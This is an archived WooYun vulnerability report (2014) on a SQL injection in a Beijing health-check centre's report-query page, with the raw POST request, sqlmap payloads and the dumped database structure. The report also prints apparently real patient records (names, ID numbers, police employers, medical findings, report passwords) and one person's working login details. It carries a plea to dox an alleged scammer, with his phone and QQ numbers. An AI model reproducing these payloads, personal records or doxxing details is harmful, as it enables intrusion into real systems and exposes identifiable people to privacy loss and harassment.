当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083780

漏洞标题:某市体检中心漏洞泄露体检报告(包括个人详细资料、身体状况等)系列三

相关厂商:cncert国家互联网应急中心

漏洞作者: 小饼仔

提交时间:2014-11-19 12:31

修复时间:2015-01-03 12:32

公开时间:2015-01-03 12:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-19: 细节已通知厂商并且等待厂商处理中
2014-11-24: 厂商已经确认,细节仅向厂商公开
2014-12-04: 细节向核心白帽子及相关领域专家公开
2014-12-14: 细节向普通白帽子公开
2014-12-24: 细节向实习白帽子公开
2015-01-03: 细节向公众公开

简要描述:

第三发来了,近50W用户的姓名,身份证号,电话,住址,公司,个人身体状况全部都有~~还有公安局的,玩了,要被跨省了!
PS. 一个妹子朋友被骗了,求人肉骗子 骗子信息 电话号码:13918792971(上海) QQ: 94478959 姓名:王小新,自称在南京读过大学,貌似是南工大01届国贸,此人租房不给退押金,人跑了,打电话不接,妹子很伤心,有消息的请私信联系,感谢各位大神帮忙,妹子爆照!

详细说明:

北京市体检中心
地址:http://www.bjtjzx.com/bgcx/
(审核注意下,360那边有个北京市体检网http://www.bjtjw.net/bjtjw/index.html,和北京市体检中心不是一个网站,找到这个洞很久了,一直没提交,还是赶快提交了,省的重复了)

111.jpg


查询处存在POST注入

POST /bgcx/chaxun.asp HTTP/1.1
Host: www.bjtjzx.com
Proxy-Connection: keep-alive
Content-Length: 75
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.bjtjzx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.bjtjzx.com/bgcx/default.asp
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: ASPSESSIONIDCCBRSRTT=NPHFJCCBPMIFELCKAHHGDNCB; CNZZDATA1719998=cnzz_eid%3D340004604-1414754488-http%253A%252F%252Fwww.bjtjzx.com%252F%26ntime%3D1414754488; chwlaz=1414755156184; chweblog_event=1414755156199; chweblog_dir=1414755156227; ASPSESSIONIDACARQSTS=EPIHFGIDHIDEENODGBKCMMIM
RA-Ver: 2.7.0
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc
xingming=aaa&kahao=111&password=11&csrq1=1970&csrq2=1&Submit2=%B2%E9%D1%AF


sqlmap

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: xingming
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: xingming=aaa' AND 9060=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (9060=9060) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(101)+CHAR(115)+CHAR(111)+CHAR(113))) AND 'KOot'='KOot&kahao=111&password=11&csrq1=1970&csrq2=1&Submit2=%B2%E9%D1%AF
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: xingming=aaa'; WAITFOR DELAY '0:0:5'--&kahao=111&password=11&csrq1=1970&csrq2=1&Submit2=%B2%E9%D1%AF
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current database:    'tijiandangan'
current user is DBA:    False
available databases [10]:
[*] Jsytjzx
[*] master
[*] model
[*] msdb
[*] newsletter
[*] Northwind
[*] pubs
[*] tempdb
[*] tiji
[*] tijian
Database: tijiandangan
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| dbo.TT_GR_Report         | 472029  |
| dbo.gr_report            | 460671  |
| dbo.cardpwd              | 422498  |
| dbo.V_Net_Report_2006    | 125743  |
| dbo.V_Net_Report_2007    | 122527  |
| dbo.V_Net_Report_2008    | 117496  |
| dbo.V_Net_Report_2005    | 113860  |
| dbo.V_Net_Report_ZZ_2008 | 106342  |
| dbo.V_Net_Report_ZZ_2009 | 102861  |
| dbo.V_Net_Report_ZZ_2010 | 100690  |
| dbo.V_Net_Report_2009    | 99613   |
| dbo.V_Net_Report_ZZ_2011 | 96611   |
| dbo.V_Net_Report_ZZ_2012 | 94951   |
| dbo.V_Net_Report_ZZ_2013 | 91334   |
| dbo.V_Net_Report_ZZ_2014 | 87563   |
| dbo.V_Net_Report_2010    | 79578   |
| dbo.V_Net_Report_2012    | 72775   |
| dbo.V_Net_Report_2013    | 71778   |
| dbo.V_Net_Report_2014    | 69606   |
| dbo.chaxun_2011          | 16725   |
| dbo.chaxun_09            | 15387   |
| dbo.chaxun_2014          | 13859   |
| dbo.chaxun_2013          | 13127   |
| dbo.chaxun_2012          | 12622   |
| dbo.chaxun_10            | 12155   |
| dbo.ZZ_chaxun_13         | 2623    |
| dbo.ZZ_chaxun_09         | 1873    |
| dbo.ZZ_chaxun_08         | 1545    |
| dbo.ZZ_chaxun_11         | 1383    |
| dbo.ZZ_chaxun_10         | 1289    |
| dbo.ZZ_chaxun_14         | 1196    |
| dbo.V_Net_Report_2012_bj | 388     |
| dbo.V_Net_Report_2011    | 332     |
| dbo.sysconstraints       | 32      |
| dbo.tongji_09            | 19      |
| dbo.tongji_10            | 19      |
| dbo.tongji_2011          | 19      |
| dbo.tongji_2013          | 19      |
| dbo.tongji_2014          | 19      |
| dbo.ZZ_tongji_08         | 19      |
| dbo.ZZ_tongji_09         | 19      |
| dbo.ZZ_tongji_10         | 19      |
| dbo.ZZ_tongji_12         | 19      |
| dbo.ZZ_tongji_13         | 19      |
| dbo.ZZ_tongji_14         | 19      |
| dbo.syssegments          | 3       |
+--------------------------+---------+


看了下数据,gr_report是用户详细信息,有将近50W

Database: tijiandangan
Table: gr_report
[22 columns]
+----------+
| Column   |
+----------+
| cardno   |
| CKJB     |
| CSRQ     |
| DWMC     |
| Flag     |
| GRDJID   |
| HYJL     |
| JLYS     |
| KH       |
| KSJL     |
| NL       |
| old      |
| password |
| position |
| RepDate  |
| SFZHM    |
| TJLX     |
| TJSJ     |
| XB       |
| XM       |
| ZJJL     |
| ZJYS     |
+----------+
泄露的信息有姓名、性别、卡号、体检小结、体检报告查询密码、身份证号码、公司等等
以下部分,麻烦审核帮忙打下码
举例
GRDJID	NL	XM	XB	KH	old	HYJL	TJLX	KSJL	JLYS	ZJYS	Flag	CSRQ	DWMC	ZJJL	TJSJ	CKJB	SFZHM	cardno	RepDate	password	position
ZZ2014070300664001	35	姜南	女	8066080	0	<Table    cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=hy_table><tr><Td colspan	健康体检	<Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=ksjc_table><tr><Td colspan=	薛慧峰	项北生	1	09 11 1979 12:00AM	北京市公安局(督察总队)--民警 2014	一、右下5易位(口腔科)<BR>    建议:<BR>    拔除。<BR>二、乳腺增生:双侧乳腺腺体结构局限性紊乱,回	07 15 2014 12:00AM	B 级	210202197909111000	8066080	07 22 2014 11:45AM	619045	1
ZZ2014070300665001	36	雷挺	男	11092319	0	<Table    cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=hy_table><tr><Td colspan	健康体检	<Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=ksjc_table><tr><Td colspan=	章平	项北生	1	01  8 1978 12:00AM	北京市公安局(督察总队)--民警 2014	一、超重 腰臀比异常 (一般检查)<BR>    建议:<BR>    1、调整饮食结构,限制每日总	07 15 2014 12:00AM	B 级	610113197801080000	11092319	07 16 2014  9:33AM	942306	1
ZZ2014070300666001	33	吴熙	男	11092264	0	<Table    cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=hy_table><tr><Td colspan	健康体检	<Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=ksjc_table><tr><Td colspan=	章平	项北生	1	11 15 1981 12:00AM	北京市公安局(督察总队)--民警 2014	一、超重 腰臀比异常 (一般检查)<BR>    建议:<BR>    1、调整饮食结构,限制每日总	07 15 2014 12:00AM	B 级	110221198111158000	11092264	07 15 2014  4:26PM	869134	1
ZZ2014070300667001	36	田文杰	男	1029639	0	<Table    cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=hy_table><tr><Td colspan	健康体检	<Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=ksjc_table><tr><Td colspan=	章平	项北生	1	04 19 1978 12:00AM	北京市公安局(督察总队)--民警 2014	体检缺项<BR><BR>本次体检所查项目未见明显异常	07 16 2014 12:00AM	B 级	110229197804190000	1029639	07 17 2014  2:10PM	658814	1
ZZ2014070300668001	40	董国源	男	11092353	0	<Table    cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=hy_table><tr><Td colspan	健康体检	<Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=ksjc_table><tr><Td colspan=	章平	项北生	1	08  3 1974 12:00AM	北京市公安局(督察总队)--民警 2014	一、超重 (一般检查)<BR>    建议:<BR>    1、调整饮食结构,限制每日总热量。<BR>&nbs	07 17 2014 12:00AM	B 级	110105197408037000	11092353	07 18 2014  7:32AM	398951	1


里面的XM,KH,PASSWORD,CSRQ
对应查询页面的姓名、卡号、密码、出生日期
我们选取一个
白雪,13074869,993661,1980 10

222.jpg


报告可在线查看、下载

333.jpg


还有其他一些表,比如

Database: tijiandangan
Table: cardpwd
[4 columns]
+----------+
| Column   |
+----------+
| cardno   |
| old      |
| password |
| position |
+----------+


是一些卡号密码
剩下的没具体研究

漏洞证明:

修复方案:

求别跨省!

版权声明:转载请注明来源 小饼仔@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-24 09:51

厂商回复:

最新状态:

暂无

漏洞评价:

评论